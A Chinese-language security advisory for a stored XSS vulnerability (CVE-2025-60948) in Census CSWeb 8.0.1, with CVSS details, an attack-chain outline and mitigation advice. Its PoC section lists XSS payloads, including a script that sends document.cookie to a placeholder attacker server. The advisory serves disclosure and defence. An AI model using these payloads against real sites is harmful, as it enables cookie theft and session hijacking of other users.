CVE-2025-60948 CVSS 4.6 中危

CVE-2025-60948 Census CSWeb 存储型XSS漏洞

披露日期: 2026-03-23

来源: 9119a7d8-5eab-497f-8521-727c672e3725

漏洞信息

漏洞编号

CVE-2025-60948

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Census CSWeb

漏洞概述

Census CSWeb 8.0.1版本存在存储型跨站脚本漏洞。由于应用程序对用户提供的输入字段缺乏适当的过滤，经过身份认证的远程攻击者可以注入恶意JavaScript脚本。这些脚本被存储在服务器端，当其他用户浏览受影响页面时，恶意代码将在其浏览器上下文中执行，从而窃取敏感信息或执行未授权操作。官方已在8.1.0 alpha版本中修复此问题。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。在Census CSWeb 8.0.1及更早版本中，系统未对用户输入的字段（如个人资料、评论或表单数据）进行严格的HTML实体编码或输入验证。攻击者利用低权限账号登录系统，在特定的输入框中注入包含恶意JavaScript代码的Payload（例如 `<script>alert(1)</script>`）。服务器接收数据后直接存储至数据库，未经过滤即返回给前端页面。当管理员或其他具有更高权限的用户访问包含该恶意数据的页面时，浏览器解析HTML并执行注入的脚本。由于脚本在受害者的浏览器环境下运行，它可以访问该域下的Document Object Model (DOM)、Cookies、LocalStorage等敏感数据。攻击者可借此窃取会话令牌（Session ID），进而劫持用户会话，或利用浏览器漏洞进行进一步攻击。CVSS向量显示攻击需要低权限（PR:L）且需要用户交互（UI:R），意味着攻击者诱导受害者访问特定页面是利用的关键环节。

攻击链分析

STEP 1

1. 获取访问权限

攻击者注册或获取一个低权限账号（PR:L），登录到Census CSWeb系统。

STEP 2

2. 注入恶意Payload

攻击者在系统提供的用户输入字段（如用户名、个人简介或表单）中插入恶意的JavaScript代码。

STEP 3

3. 存储恶意代码

由于系统缺乏过滤，服务器将包含恶意脚本的数据直接存储在数据库中。

STEP 4

4. 触发漏洞

攻击者诱导受害者（如管理员）访问包含该恶意数据的页面（UI:R）。

STEP 5

5. 执行攻击

受害者的浏览器解析页面时执行恶意脚本，可能导致Cookie窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2025-60948
Place this payload in a vulnerable user-supplied field (e.g., User Profile, Comments).
-->

<!-- Payload 1: Basic Script Execution -->
<script>alert('CVE-2025-60948 Stored XSS');</script>

<!-- Payload 2: Image Onerror (Stealthier) -->
<img src=x onerror=alert('CVE-2025-60948')>

<!-- Payload 3: Cookie Stealer Simulation -->
<script>
var img = new Image();
img.src = "http://attacker-controlled-server.com/steal?c=" + document.cookie;
</script>

影响范围

Census CSWeb <= 8.0.1

防御指南

临时缓解措施

如果无法立即升级，建议部署Web应用防火墙（WAF）以拦截常见的XSS攻击模式。同时，管理员应审查数据库中已存储的用户数据，清除潜在的恶意脚本，并限制低权限用户对敏感输入字段的修改权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表